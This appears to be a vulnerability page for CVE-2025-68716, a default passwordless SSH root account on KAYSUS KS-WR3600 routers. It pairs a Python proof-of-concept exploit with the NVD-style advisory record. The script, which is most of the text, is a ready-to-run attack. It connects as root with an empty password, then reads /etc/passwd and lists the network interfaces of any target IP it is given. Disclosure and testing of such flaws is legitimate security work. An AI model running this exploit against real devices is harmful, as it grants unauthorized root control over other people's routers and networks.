CVE-2025-68716

# CVE-2025-68716 PoC - KAYSUS KS-WR3600 Router Root Access # Affected: KAYSUS KS-WR3600 with firmware 1.0.5.9.1 # Vulnerability: SSH root account with no password enabled by default import socket import sys from paramiko import SSHClient, AutoAddPolicy def check_ssh_port(ip, port=22, timeout=5): """Check if SSH port is open on target""" sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(timeout) try: result = sock.connect_ex((ip, port)) sock.close() return result == 0 except: return False def exploit_cve_2025_68716(target_ip): """Exploit CVE-2025-68716: Login to KAYSUS router via SSH with no password""" print(f"[*] Target: {target_ip}") print(f"[*] Testing SSH service on port 22...") if not check_ssh_port(target_ip): print("[-] SSH port is not accessible") return False print("[+] SSH port is open, attempting root login with no password...") client = SSHClient() client.set_missing_host_key_policy(AutoAddPolicy()) try: # CVE-2025-68716: Root account has no password client.connect( hostname=target_ip, port=22, username='root', password='', timeout=10, allow_agent=False, look_for_keys=False ) print("[+] SUCCESS: Logged in as root with no password!") # Execute commands to verify root access stdin, stdout, stderr = client.exec_command('whoami; uname -a; cat /etc/passwd | grep root') print("\n[+] Command output:") print(stdout.read().decode()) # List network interfaces stdin, stdout, stderr = client.exec_command('ip addr show') print("\n[+] Network interfaces:") print(stdout.read().decode()) client.close() return True except Exception as e: print(f"[-] Login failed: {str(e)}") return False def main(): if len(sys.argv) < 2: print("Usage: python cve-2025-68716.py <target_ip>") print("Example: python cve-2025-68716.py 192.168.1.1") sys.exit(1) target_ip = sys.argv[1] exploit_cve_2025_68716(target_ip) if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-68716", "sourceIdentifier": "[email protected]", "published": "2026-01-08T21:15:43.187", "lastModified": "2026-02-02T16:49:29.783", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "KAYSUS KS-WR3600 routers with firmware 1.0.5.9.1 enable the SSH service enabled by default on the LAN interface. The root account is configured with no password, and administrators cannot disable SSH or enforce authentication via the CLI or web GUI. This allows any LAN-adjacent attacker to trivially gain root shell access and execute arbitrary commands with full privileges."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-306"}, {"lang": "en", "value": "CWE-521"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:kaysus:ks-wr3600_firmware:1.0.5.9.1:*:*:*:*:*:*:*", "matchCriteriaId": "5A325820-C480-454D-9A4F-AC61604C5566"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:kaysus:ks-wr3600:-:*:*:*:*:*:*:*", "matchCriteriaId": "B2859021-9B27-47E2-9802-AE453C915F8D"}]}]}], "references": [{"url": "https://github.com/actuator/cve/blob/main/KAYSUS/CVE-2025-68716.txt", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/actuator/cve/tree/main/KAYSUS", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.kaysus.com/ks_wr3600__wifi_7_be3600_wireless_router.html", "source": "[email protected]", "tags": ["Product"]}]}}